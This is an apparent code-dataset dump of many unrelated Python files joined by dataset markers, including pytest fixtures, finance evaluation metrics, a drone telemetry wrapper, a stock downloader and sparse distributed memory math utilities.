pos = torch.cat(pos_all, dim=0).view(len(test_data), -1, 3).detach().cpu().numpy() # [T, joint_num, xyz]
ang = torch.cat(ang_all, dim=0).view(len(test_data), -1).detach().cpu().numpy()
hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'inference.h5'), 'w')
g1 = hf.create_group('group1')
g1.create_dataset('l_joint_pos_2', data=pos[:, :7])
g1.create_dataset('r_joint_pos_2', data=pos[:, 7:])
g1.create_dataset('l_joint_angle_2', data=ang[:, :7])
g1.create_dataset('r_joint_angle_2', data=ang[:, 7:])
g1.create_dataset('l_glove_angle_2', data=l_hand_angle)
g1.create_dataset('r_glove_angle_2', data=r_hand_angle)
hf.close()
print('Target H5 file saved!')
| nilq/baby-python | python |
"""
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
import pytest
from byceps.services.board.dbmodels.posting import Posting as DbPosting
from byceps.services.board.dbmodels.topic import Topic as DbTopic
from byceps.services.board.transfer.models import Board, Category
from byceps.services.user.transfer.models import User
from tests.helpers import log_in_user
from .helpers import create_category, create_posting, create_topic
@pytest.fixture(scope='package')
def category(board: Board) -> Category:
return create_category(board.id, number=1)
@pytest.fixture(scope='package')
def another_category(board: Board) -> Category:
return create_category(board.id, number=2)
@pytest.fixture
def topic(category: Category, board_poster: User) -> DbTopic:
return create_topic(category.id, board_poster.id)
@pytest.fixture
def posting(topic: DbTopic, board_poster: User) -> DbPosting:
return create_posting(topic.id, board_poster.id)
@pytest.fixture(scope='package')
def board_poster(make_user) -> User:
return make_user()
@pytest.fixture(scope='package')
def moderator(make_admin) -> User:
permission_ids = {
'board.hide',
'board_topic.lock',
'board_topic.move',
'board_topic.pin',
}
moderator = make_admin(permission_ids)
log_in_user(moderator.id)
return moderator
@pytest.fixture(scope='package')
def moderator_client(make_client, site_app, moderator: User):
return make_client(site_app, user_id=moderator.id)
| nilq/baby-python | python |
"""
Here is a batch of evaluation functions.
The interface should be redesigned carefully in the future.
"""
import pandas as pd
from typing import Tuple
from qlib import get_module_logger
from qlib.utils.paral import complex_parallel, DelayedDict
from joblib import Parallel, delayed
def calc_long_short_prec(
pred: pd.Series, label: pd.Series, date_col="datetime", quantile: float = 0.2, dropna=False, is_alpha=False
) -> Tuple[pd.Series, pd.Series]:
"""
calculate the precision for long and short operation
:param pred/label: index is **pd.MultiIndex**, index name is **[datetime, instruments]**; columns names is **[score]**.
.. code-block:: python
score
datetime instrument
2020-12-01 09:30:00 SH600068 0.553634
SH600195 0.550017
SH600276 0.540321
SH600584 0.517297
SH600715 0.544674
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
long precision and short precision in time level
"""
if is_alpha:
label = label - label.mean(level=date_col)
if int(1 / quantile) >= len(label.index.get_level_values(1).unique()):
raise ValueError("Need more instruments to calculate precision")
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
# find the top/low quantile of prediction and treat them as long and short target
long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label).reset_index(level=0, drop=True)
short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label).reset_index(level=0, drop=True)
groupll = long.groupby(date_col)
l_dom = groupll.apply(lambda x: x > 0)
l_c = groupll.count()
groups = short.groupby(date_col)
s_dom = groups.apply(lambda x: x < 0)
s_c = groups.count()
return (l_dom.groupby(date_col).sum() / l_c), (s_dom.groupby(date_col).sum() / s_c)
def calc_long_short_return(
pred: pd.Series,
label: pd.Series,
date_col: str = "datetime",
quantile: float = 0.2,
dropna: bool = False,
) -> Tuple[pd.Series, pd.Series]:
"""
calculate long-short return
Note:
`label` must be raw stock returns.
Parameters
----------
pred : pd.Series
stock predictions
label : pd.Series
stock returns
date_col : str
datetime index name
quantile : float
long-short quantile
Returns
----------
long_short_r : pd.Series
daily long-short returns
long_avg_r : pd.Series
daily long-average returns
"""
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
r_long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label.mean())
r_short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label.mean())
r_avg = group.label.mean()
return (r_long - r_short) / 2, r_avg
def pred_autocorr(pred: pd.Series, lag=1, inst_col="instrument", date_col="datetime"):
"""pred_autocorr.
Limitation:
- If the datetime is not sequential densely, the correlation will be calulated based on adjacent dates. (some users may expected NaN)
:param pred: pd.Series with following format
instrument datetime
SH600000 2016-01-04 -0.000403
2016-01-05 -0.000753
2016-01-06 -0.021801
2016-01-07 -0.065230
2016-01-08 -0.062465
:type pred: pd.Series
:param lag:
"""
if isinstance(pred, pd.DataFrame):
pred = pred.iloc[:, 0]
get_module_logger("pred_autocorr").warning("Only the first column in {pred.columns} of `pred` is kept")
pred_ustk = pred.sort_index().unstack(inst_col)
corr_s = {}
for (idx, cur), (_, prev) in zip(pred_ustk.iterrows(), pred_ustk.shift(lag).iterrows()):
corr_s[idx] = cur.corr(prev)
corr_s = pd.Series(corr_s).sort_index()
return corr_s
def pred_autocorr_all(pred_dict, n_jobs=-1, **kwargs):
"""
calculate auto correlation for pred_dict
Parameters
----------
pred_dict : dict
A dict like {<method_name>: <prediction>}
kwargs :
all these arguments will be passed into pred_autocorr
"""
ac_dict = {}
for k, pred in pred_dict.items():
ac_dict[k] = delayed(pred_autocorr)(pred, **kwargs)
return complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), ac_dict)
def calc_ic(pred: pd.Series, label: pd.Series, date_col="datetime", dropna=False) -> (pd.Series, pd.Series):
"""calc_ic.
Parameters
----------
pred :
pred
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
ic and rank ic
"""
df = pd.DataFrame({"pred": pred, "label": label})
ic = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"]))
ric = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"], method="spearman"))
if dropna:
return ic.dropna(), ric.dropna()
else:
return ic, ric
def calc_all_ic(pred_dict_all, label, date_col="datetime", dropna=False, n_jobs=-1):
"""calc_all_ic.
Parameters
----------
pred_dict_all :
A dict like {<method_name>: <prediction>}
label:
A pd.Series of label values
Returns
-------
{'Q2+IND_z': {'ic': <ic series like>
2016-01-04 -0.057407
...
2020-05-28 0.183470
2020-05-29 0.171393
'ric': <rank ic series like>
2016-01-04 -0.040888
...
2020-05-28 0.236665
2020-05-29 0.183886
}
...}
"""
pred_all_ics = {}
for k, pred in pred_dict_all.items():
pred_all_ics[k] = DelayedDict(["ic", "ric"], delayed(calc_ic)(pred, label, date_col=date_col, dropna=dropna))
pred_all_ics = complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), pred_all_ics)
return pred_all_ics
| nilq/baby-python | python |
from setuptools import setup, find_packages
from os.path import join, dirname
import sys
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
print("This script requires Python >= 3.6")
exit(1)
setup(
name="vkmix",
version="1.5",
author="alekssamos",
author_email="aleks-samos@yandex.ru",
url="https://github.com/alekssamos/vkmix/",
packages=find_packages(),
include_package_data=True,
long_description_content_type="text/markdown",
long_description=open(join(dirname(__file__), "README.md"), encoding="UTF8").read(),
)
| nilq/baby-python | python |
"""A basic JSON encoder to handle numpy and bytes types
>>> bool_array = np.array([True])
>>> bool_value = bool_array[0]
>>> obj = {'an_array': np.array(['a']), 'an_int64': np.int64(1), 'some_bytes': b'a', 'a_bool': bool_value}
>>> assert dumps(obj)
"""
import base64
import json
from functools import partial
import numpy as np
class OtoJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, np.int64):
return float(obj)
if isinstance(obj, bytes):
return base64.b64encode(obj).decode('utf-8')
if isinstance(obj, np.bool_):
return True if np.bool_(True) == obj else False
return json.JSONEncoder.default(self, obj)
json_dump_partial_kwargs = {
'allow_nan': False,
'indent': None,
'separators': (',', ':'),
'sort_keys': True,
'cls': OtoJsonEncoder,
}
dump = partial(json.dump, **json_dump_partial_kwargs)
dumps = partial(json.dumps, **json_dump_partial_kwargs)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
import codecs
import io
import logging
import os
import re
import shutil
import sys
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import tempfile
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
from py3kwarn2to3 import main
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
PY2_TEST_MODULE = os.path.join(TEST_DATA_DIR, "py2_test_grammar.py")
class TestMain(unittest.TestCase):
if not hasattr(unittest.TestCase, 'assertNotRegex'):
# This method was only introduced in 3.2.
def assertNotRegex(self, text, regexp, msg=None):
if not hasattr(regexp, 'search'):
regexp = re.compile(regexp)
if regexp.search(text):
self.fail("regexp %s MATCHED text %r" % (regexp.pattern, text))
def setUp(self):
self.temp_dir = None # tearDown() will rmtree this directory if set.
def tearDown(self):
# Clean up logging configuration down by main.
del logging.root.handlers[:]
if self.temp_dir:
shutil.rmtree(self.temp_dir)
def run_2to3_capture(self, args, in_capture, out_capture, err_capture):
save_stdin = sys.stdin
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdin = in_capture
sys.stdout = out_capture
sys.stderr = err_capture
try:
return main.main("py3kwarn2to3.fixes", args)
finally:
sys.stdin = save_stdin
sys.stdout = save_stdout
sys.stderr = save_stderr
def test_unencodable_diff(self):
input_stream = StringIO(u"print 'nothing'\nprint u'über'\n")
out = io.BytesIO() if sys.version_info[0] > 2 else StringIO()
out_enc = codecs.getwriter("ascii")(out)
err = StringIO()
ret = self.run_2to3_capture(["-"], input_stream, out_enc, err)
self.assertEqual(ret, 0)
output = out.getvalue()
if sys.version_info[0] > 2:
output = output.decode("ascii")
self.assertTrue("-print 'nothing'" in output)
self.assertTrue("WARNING: couldn't encode <stdin>'s diff for "
"your terminal" in err.getvalue())
def setup_test_source_trees(self):
"""Setup a test source tree and output destination tree."""
self.temp_dir = tempfile.mkdtemp() # tearDown() cleans this up.
self.py2_src_dir = os.path.join(self.temp_dir, "python2_project")
self.py3_dest_dir = os.path.join(self.temp_dir, "python3_project")
os.mkdir(self.py2_src_dir)
os.mkdir(self.py3_dest_dir)
# Turn it into a package with a few files.
self.setup_files = []
open(os.path.join(self.py2_src_dir, "__init__.py"), "w").close()
self.setup_files.append("__init__.py")
shutil.copy(PY2_TEST_MODULE, self.py2_src_dir)
self.setup_files.append(os.path.basename(PY2_TEST_MODULE))
self.trivial_py2_file = os.path.join(self.py2_src_dir, "trivial.py")
self.init_py2_file = os.path.join(self.py2_src_dir, "__init__.py")
with open(self.trivial_py2_file, "w") as trivial:
trivial.write("print 'I need a simple conversion.'")
self.setup_files.append("trivial.py")
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
from django.contrib import admin
from .models import Nurse, NursePatient
class NurseAdmin(admin.ModelAdmin):
model = Nurse
list_display = ['user', ]
class NursePatientAdmin(admin.ModelAdmin):
model = NursePatient
list_display = ['nurse', 'patient', ]
admin.site.register(Nurse, NurseAdmin)
admin.site.register(NursePatient, NursePatientAdmin)
# Register your models here.
| nilq/baby-python | python |
class Reactor(object) :
def addReadCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeReadCallback( self, sockfd ) :
raise NotImplementedError
def addWriteCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeWriteCallback( self, sockfd ) :
raise NotImplementedError
def addExceptionCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeExceptionCallback( self, sockfd ) :
raise NotImplementedError
# timeout is seconds in floating point, returns async.Op
def addTimer( self, timeout, callback=None ) :
raise NotImplementedError
# single shot timer, timeout is float, return async.Op
def callLater( self, timeout, callback=None ) :
raise NotImplementedError
| nilq/baby-python | python |
from dronekit import *
from pymavlink import mavutil
import argparse
import serial
from random import uniform
class Pixhawk:
def __init__(self):
self.status = (
"down"
) # this status is used to check if a service is functioning normaly or not
self.vehicle = None
def start(self):
print("starting Pixhawk")
self.status = "running"
# this function will at least connect to pixhawk for future telem data retrieval.
parser = argparse.ArgumentParser()
parser.add_argument("--connect", default="/dev/serial0")
parser.add_argument("--baud", default="921600")
args = parser.parse_args()
self.connect(args)
def stop(self):
print("stopping Telemetry Data")
self.status = "down"
# this function should kill the connection to the pixhawk and
# any other processes it has started.
self.disconnect()
def check_status(self):
# check all possible processes that may not be working properly, make sure they return
# expected values.
# return list of broken services.
if self.connection_status:
print("Status: Active")
print("GPS connection state: %s" % vehicle.gps_0)
else:
print("Status: Broken (see above for details)")
# Connect to the vehicle
def connect(self, args):
print("Connecting to aircraft via: %s" % args.connect)
try:
self.vehicle = connect(args.connect, baud=921600, wait_ready=True)
self.connection_status = 1
# Dronekit Error
except APIException:
print("The connection has timed out.")
self.connection_status = 0
self.status = "pixhawk connection broken"
# Other error
except:
print("Error connecting to pixhawk via serial.")
self.connection_status = 0
self.status = "pixhawk connection broken"
# Close vehicle connection
def disconnect(self):
self.vehicle.close()
self.connection_status = 0
# Use for testing gps signal and telemetry data retrieval. WARNING: this method creates an infinite loop.
def gps_test(self):
pass
while True:
time.sleep(1)
def getDirection(self):
# Returns a value between 0-360 depending on the direction the ground vehicle is facing
if not self.vehicle:
return -1
return -1
def getLat(self): # Get vehicle latitude
if not self.vehicle:
return -1
return str(self.vehicle.location.global_relative_frame.lat)
def getLon(self): # Get vehicle longitude
if not self.vehicle:
return -1
return str(self.vehicle.location.global_relative_frame.lon)
def getAlt(self): # Get vehicle altitude
if not self.vehicle:
return -1
return self.vehicle.location.global_relative_frame.alt
def get_location(self): # Get vehicle postion (Returns dict of lat,long, and alt)
return {"lat": self.getLat(), "lon": self.getLon(), "alt": self.getAlt()}
pixhawk = Pixhawk()
| nilq/baby-python | python |
import brownie
def test_withdraw_all(splitter, alice, bob):
initial_alice_balance = alice.balance()
initial_contract_balance = splitter.balance()
initial_alice_contract_balance = splitter.balances(alice)["balance"]
initial_bob_balance = bob.balance()
initial_bob_contract_balance = splitter.balances(bob)["balance"]
splitter.withdrawAll({"from": alice})
assert alice.balance() - initial_alice_balance == initial_alice_contract_balance
assert initial_bob_balance == bob.balance()
assert initial_bob_contract_balance == splitter.balances(bob)["balance"]
assert splitter.balances(alice)["balance"] == 0
assert (
splitter.balance() == initial_contract_balance - initial_alice_contract_balance
)
def test_withdraw_all_zero_amount(splitter, alice):
splitter.withdrawAll({"from": alice})
with brownie.reverts():
splitter.withdrawAll({"from": alice})
def test_withdraw_all_not_payee(splitter, david):
with brownie.reverts():
splitter.withdrawAll({"from": david})
| nilq/baby-python | python |
#econogee, 1/28/2016
#Stock Data Retrieval Script
#If executed via the command line, will produce 500 data files with stock price information
#between the dates specified in the main method. Can also be imported to use the RetrieveStock method.
import os
import sys
import numpy as np
import urllib2
def RetrieveStock(TickerSymbol,start,end):
startday,startmonth,startyear = (str(s) for s in start)
endday,endmonth,endyear = (str(s) for s in end)
response = urllib2.urlopen('http://real-chart.finance.yahoo.com/table.csv?s='+str(TickerSymbol)+\
'&a=' + startday + '&b=' + startmonth + '&c=' + startyear + \
'&d=' + endday + '&e=' + endmonth + '&f=' + endyear + \
'&g=d&ignore=.csv')
html = response.read()
html = html.split('\n')
html = np.array(html)
return html
def main():
startday = str(0)
startmonth = str(1)
startyear = str(2005)
endday = str(30)
endmonth = str(1)
endyear = str(2016)
symbols = []
with open('stocklist.csv') as f:
content = f.readlines()
for l in content:
symbols.append(l.split(",")[0])
for s in symbols:
html = RetrieveStock(s,(startday,startmonth,startyear),(endday,endmonth,endyear))
np.savetxt(str(s),html,fmt='%s',delimiter=',')
if __name__ == "__main__": main() | nilq/baby-python | python |
import os
import sys
def pre_process(baseDir, x1, x2, x3):
"""
An utility function to pre-process the .comm input files by reading it
and replacing the design variables(Length, Breadth and Thickness) values with
the values provided by BOA
PARAMS:
baseDir - The path of the directory which holds the required input files
x1 - Length
x2 - Thickness
x3 - Breadth
RETURNS:
This function returns the name of export file which is present
in the baseDir which is required for simulation
"""
cnt = 0
# Getting the path of the required input files present in the baseDir
for file in os.listdir(baseDir):
if file.endswith(".comm"):
cnt += 1
comm_file = os.path.join(baseDir, file)
elif file.endswith(".export"):
cnt += 1
export_file = file
elif file.endswith(".mmed"):
cnt += 1
# Checking whether the base directory has all required input files
if cnt < 3:
raise FileNotFoundError("One or all required input files are missing "
"in the directory")
sys.exit()
# Opening the .comm file to pre-process the design variables
fhc = open(comm_file, 'r+')
data = fhc.readlines()
# Loops to update all 3 design variables values
# EP - thickness, LONG - Length, LARG - Breadth
for i, v in enumerate(data):
if 'EP' in v:
data[i] = v.split('=')[0] + '= ' + str(x2) + '\n'
break
for i, v in enumerate(data):
if 'LONG' in v:
data[i] = v.split('=')[0] + '= ' + str(x1) + '\n'
break
for i, v in enumerate(data):
if 'LARG' in v:
data[i] = v.split('=')[0] + '= ' + str(x3) + '\n'
break
# Writing the new data to .comm file
fhc.seek(0)
fhc.truncate()
fhc.writelines(data)
fhc.close()
return export_file
def post_process(baseDir):
"""
An utility function to post-process the .resu result file to get
the desired displacement value from file
PARAMS:
baseDir - The path of the directory which holds the output .resu file
RETURNS:
This function returns the displacement value for that epoch
"""
# Getting the path of the output file created in the baseDir post simulation
for file in os.listdir(baseDir):
if file.endswith(".resu"):
resu_file = os.path.join(baseDir, file)
# Opening the .resu file to post-process the result to get the required
# Displacement variable value
fhc = open(resu_file, 'r')
data = fhc.readlines()
fhc.close()
# Post processing the result
y = data[198].split()[-1]
# Delete the result file
os.remove(resu_file)
return float(y)
| nilq/baby-python | python |
#! /usr/bin/env python3.8
from larning.setup import (
get_version,
get_github_url,
PACKAGE_NAME,
PACKAGES,
setup,
LONG_DESCRIPTION,
require_interpreter_version,
)
# ˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇ
require_interpreter_version(3, 8, 0)
version = get_version(0, 0, 0)
INSTALL_REQUIRES = []
AUTHOR = "Tasnádi Gábor"
EMAIL = "tasi.gabi97@gmail.com"
URL = get_github_url("tasigabi97")
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
setup(
name=PACKAGE_NAME,
version=version,
author=AUTHOR,
author_email=EMAIL,
description=PACKAGE_NAME,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url=URL,
packages=PACKAGES,
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 3 - Alpha",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
],
install_requires=INSTALL_REQUIRES,
keywords=[
PACKAGE_NAME,
],
license="MIT",
)
| nilq/baby-python | python |
import torch.nn as nn
import torch
import math
class AffinityLayer(nn.Module):
"""
Affinity Layer to compute the affinity matrix from feature space.
M = X * A * Y^T
Parameter: scale of weight d
Input: feature X, Y
Output: affinity matrix M
"""
def __init__(self, dim):
super(AffinityLayer, self).__init__()
self.dim = dim # 1024
self.A = nn.Parameter(torch.Tensor(self.dim, self.dim))
self.reset_parameters()
def reset_parameters(self):
std = 1. / math.sqrt(self.dim)
self.A.data.uniform_(-std, std)
self.A.data += torch.eye(self.dim)
def forward(self, X, Y):
assert X.shape[2] == Y.shape[2] == self.dim
M = torch.matmul(X, (self.A + self.A.transpose(0, 1)) / 2)
M = torch.matmul(M, Y.transpose(1, 2))
return M
| nilq/baby-python | python |
import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def softmax(x):
x_exp = np.exp(x)
return x_exp /np.sum(x_exp)
def relu(x):
return np.maximum(x, np.zeros_like(x))
| nilq/baby-python | python |
"""
Author: Trenton Bricken @trentbrick
All functions in this script are used to generate and approximate the circle intersection
in binary and continuous space and also convert between cosine similarity and hamming distance.
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import binom, norm
from scipy.sparse import csc_matrix, coo_matrix, csr_matrix
import pandas as pd
import scipy
from scipy.integrate import quad
import time
from scipy.special import comb
import torch
import torch.optim as optim
import torch.nn.functional as F
def softmax(x, beta):
assert len(x.shape) <3, 'this softmax can currently only handle vectors'
x = x * beta
return np.exp(x)/np.exp(x).sum()
def check_cosine_and_hamm_bounds(cosines, hamms, n):
"""
Ensuring conversion between cosine and hamming distance don't have
any numerical errors.
"""
if not torch.is_tensor(cosines):
cosines, hamms = np.asarray(cosines), np.asarray(hamms)
assert (hamms<0).sum() == 0 and (hamms > n).sum() == 0, "Hamm is out of bounds!"
assert (cosines>1).sum() == 0 and (cosines<-1).sum() == 0, "Cosine is out of bounds!"
def cosine_to_hamm(cosines, n):
if torch.is_tensor(cosines):
# some cosines are numerically unstable in being larger than 1.0 by a small epsilon...
# going to fix these.
numerical_error_inds = torch.logical_and(cosines>1, cosines < 1+ 1e-4)
cosines[numerical_error_inds] -=1e-4
hamms = n*(1-cosines)/2
hamms = torch.floor(hamms) if torch.is_tensor(cosines) else np.floor(hamms)
check_cosine_and_hamm_bounds(cosines, hamms, n)
return hamms
def hamm_to_cosine(hamms, n):
cosines = 1-(hamms*2/n)
check_cosine_and_hamm_bounds(cosines, hamms, n)
return cosines
def torch_hamm_dist(A, B):
"""
Assuming that A and B have patterns as vectors when input.
The columns of what is returned will be A compared with everything in B.
Therefore the order of what comes first is important!
"""
assert len(A.shape) == len(B.shape), "Need for A and B to be the same shape."
return torch.cdist(A.T.type(torch.float), B.T.type(torch.float), p=0).type(torch.int).T
### FUNCTIONS APPROXIMATING A KNOWN AND PROVIDED CIRCLE INTERSECTION:
def get_binary_and_continuous_caches(n, hamm_radius, r, cont_cache_resolution):
"""
Getting both the binary and continuous circle intersection results and caching them
to make the SDM experiments run much more efficiently.
"""
all_dvs = np.arange(0,n+1)
cached_intersects = expected_intersection_lune(n, all_dvs, hamm_radius, r)
cs_intervals = np.linspace(-1,1,cont_cache_resolution).astype(float)
cs_intervals[-1] = cs_intervals[-1] - 1e-15
log_continuous_cached_intersects = cap_intersection(n, cs_intervals, hamm_radius, r,
return_log=True,
ham_input=False, print_oobs=False)
return cached_intersects, log_continuous_cached_intersects
def fit_beta_regression(n, xvals, res, return_bias=False, ham_input=True):
""" Log linear regression to fit a beta coefficent to whatever is input."""
xvals = np.asarray(xvals)
res = np.asarray(res)
if ham_input:
xvals = hamm_to_cosine(xvals, n)
zeros_in_res = False
# need to remove any zeros for this calculation.
if res[-1] == 0.0:
print("res equals 0, problem for the log. Removing from the equation here.")
mask = res!=0.0
num_zeros = (res==0.0).sum()
res = res[mask]
xvals = xvals[mask]
zeros_in_res = True
yvals = np.log(np.asarray(res))
# log linear regression closed form solution.
beta = np.cov(xvals, yvals)[0][1] / np.var(xvals)
bias = np.mean(yvals) - beta*np.mean(xvals)
#mse between res and beta res:
#print('Beta Fit MSE:',np.sum((res-np.exp(beta*xvals)+bias)**2)/len(res) )
if return_bias:
return beta, bias
else:
return beta
def fit_softmax_backprop(n, dvals, targets, lr=0.3, niters=5000, ham_input=False, plot_losses=True):
"""
Learns an approximation to the circle intersection that is normalized. Ie fits a softmax function. This is unrealistic in
that it overfits to the softmax rather than the exponential approximation where the softmax is conditioned upon the number of inputs in the normalizing constant. But is still
interesting to analyze for what a perfect Beta fit to a particular softmax would be.
"""
#
targets = torch.Tensor(targets/sum(targets))
if ham_input:
xvals = torch.Tensor( hamm_to_cosine(dvals, n) )
else:
xvals = torch.Tensor(dvals)
beta = torch.nn.Parameter(torch.Tensor(np.random.uniform(1,30, 1)), requires_grad=True)
optimizer = optim.Adam([beta], lr=lr)
losses = []
for i in range(niters):
# training loop:
optimizer.zero_grad() # zero the gradient buffers
preds = F.softmax(beta*xvals)
loss = ((targets-preds)**2).sum() / len(dvals)
loss.backward()
optimizer.step()
losses.append(loss.item())
if plot_losses:
plt.figure()
plt.plot(losses)
plt.title("Losses during learning")
plt.show()
print("final loss", loss.item())
return beta.item()
def integral_func(phi, th1, n):
""" Used in computing the continuous hypersphere cap intersection below. """
return np.sin(phi)**(n-2) * scipy.special.betainc( (n-2)/2 , 1/2, 1-( (np.tan(th1))/(np.tan(phi)) )**2 )
def log_J_n(th1, th2, r, n):
""" Used in computing the continuous hypersphere cap intersection below. """
integral = quad(integral_func, th1, th2, args=(th1, n) )[0]
#print(np.log(np.pi**( (n-1) /2) ) , scipy.special.loggamma( (n-1) /2), np.log(r**(n-1)), np.log(integral ))
return np.log(np.pi**( (n-1) /2) ) - scipy.special.loggamma( (n-1) /2) + np.log(r**(n-1)) + np.log(integral )
def cap_intersection(n, cs_dvs, hamm_radius, r, rad=1,
return_log=False, ham_input = False, print_oobs=False):
"""
Computes the continuous hypersphere cap intersection.
Does all compute in log space for numerical stability, option to return
log results or not.
"""
#size of total space
log_total_space = log_hypersphere_sa(n,rad)
if r is not None:
if type(r) != int:
r = np.round(r) # number of neurons
r = float(r)
log_perc_addresses_w_neurons = np.log(r) - log_total_space
else:
log_perc_addresses_w_neurons = np.log(1e40) # a very large number of neurons
if ham_input:
cs_dvs = hamm_to_cosine(cs_dvs)
c_dist = hamm_to_cosine(hamm_radius,n)
t1 = t2 = np.arccos(c_dist)
log_inters = []
for cs_dv in cs_dvs:
tv = np.arccos(cs_dv)
if tv>=t1+t2 or t1+t2>(2*np.pi)-tv:
if print_oobs:
print("out of equation bounds", cs_dv)
log_inters.append(np.nan)
continue
tmin = np.arctan( (np.cos(t1)/(np.cos(t2)*np.sin(tv))) - (1/np.tan(tv)) )
assert np.round(tmin,5) == np.round(tv-tmin,5)
assert np.round(t2,5)==np.round(t1,5)
log_inters.append(2+log_J_n(tmin, t2, rad, n) )
log_inters = np.asarray(log_inters)
log_num_expected_neurons = log_inters + log_perc_addresses_w_neurons
if return_log:
# have not removed the nans either
log_num_expected_neurons = np.nan_to_num(log_num_expected_neurons, nan=-1e+30)
return log_num_expected_neurons
else:
num_expected_neurons = np.exp(log_num_expected_neurons)
num_expected_neurons = np.nan_to_num(num_expected_neurons, nan=0.0)
return num_expected_neurons
def log_hypersphere_sa(n, rad=1):
# n dim hypersphere surface area.
# https://en.wikipedia.org/wiki/Unit_sphere
# assuming L2 norm with r=1!
return np.log(2* (np.pi**(n/2) ) ) - scipy.special.loggamma(n/2) + np.log(rad**(n-1))
def hypersphere_v(n, r):
"""
Volume of a hypersphere. Not used but implemented.
"""
return (np.pi**(n/2) )/(scipy.special.gamma((n+1)/2) )*(r**n)
def expected_intersection_lune(n, dvals, hamm_radius, r):
# This equation gives the same results as the one we derive and present in the paper. It was introduced in the SDM book and runs a bit faster.
"""
Computes the fraction of the space that exists in the circle intersection using the Lune equation.
args::
n = space dimension
dvals = Hamm dist between circle centers
hamm_radius = hamming distance radius each circle uses
r = number of neurons
hard_mem_places = turns the fraction of the space in the
expected number of neurons
that exist in this fraction.
------------
returns::
res = list of floats for fraction of the space
"""
#ensure all are ints:
n = int(n)
hamm_radius = int(hamm_radius)
if r is not None:
r = int(r)
perc_addresses_w_neurons = r/(2**n)
else:
perc_addresses_w_neurons = 1.0
res = []
area = 0
# compute size of circle
for i in range(hamm_radius+1):
area += comb(n,i)
for d in dvals:
# compute lune
d = int(d)
lune = 0
for i in range(d):
j = i+1
if j%2==0:
continue
lune+= comb(j-1, (j-1)/2)*comb(n-j, hamm_radius-((j-1)/2))
intersect = area - lune
#print(d, intersect, area, lune, perc_addresses_w_neurons)
expected_intersect = np.log(intersect)+np.log(perc_addresses_w_neurons)
res.append(np.exp(expected_intersect))
res = np.asarray(res)
res = np.nan_to_num(res, nan=0.0)
return res
def expected_intersection_interpretable(n, dvals, hamm_radius, r, weight_type=None):
if r is None:
r = 1.0
perc_addresses_w_neurons = np.log(float(r)) - np.log(2.0**n)
res = []
for dval in dvals:
possible_addresses = 0
for a in np.arange(n-hamm_radius-(dval//2),n+0.1-dval):
# solve just for b then c is determined.
bvals = np.arange(np.maximum(0,n-hamm_radius-a), dval-(n-hamm_radius-a)+0.1) # +0.1 to ensure that the value here is represented.
#print(a, 'b values', bvals)
if len(bvals)==0:
continue
if weight_type == "Linear":
# linear weighting from the read and write operations.
weighting = ((a+bvals)/n) * ( (a+(dval-bvals))/n )
if weight_type == "Expo":
# linear weighting from the read and write operations.
weighting = np.exp(-0.01*(n-(a+bvals))) * np.exp(-0.01*(n-(a+(dval-bvals))))
elif not weight_type:
weighting = 1
possible_addresses += comb(n-dval,a)*(weighting*comb(dval,bvals)).sum()
expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
res.append(np.exp(expected_intersect))
return np.asarray(res)
def space_frac_to_hamm_radius(n, space_frac_rang):
""" Computes the Hamming distance that should be used for a circle
to have an area that includes a given fraction of a given n
dimensional space.
args::
- n = space dimension
- space_frac_rang = list of space fractions to use
returns::
-list of hamming distances to use
"""
hamm_radiusances = []
for space_frac in space_frac_rang:
hamm_radiusances.append( int(binom.ppf(space_frac, n, 0.5)) )
return hamm_radiusances
def hamm_radius_to_space_frac(n, hamm_radius_rang):
""" Computes the space fraction $p$ that corresponds to a given Hamming distance input
args::
- n = space dimension
- space_frac_rang = list of Hamming distances used
returns::
- list of p fractions
"""
pfracs = []
for hd in hamm_radius_rang:
pfracs.append( binom.cdf(hd, n, 0.5) )
return pfracs
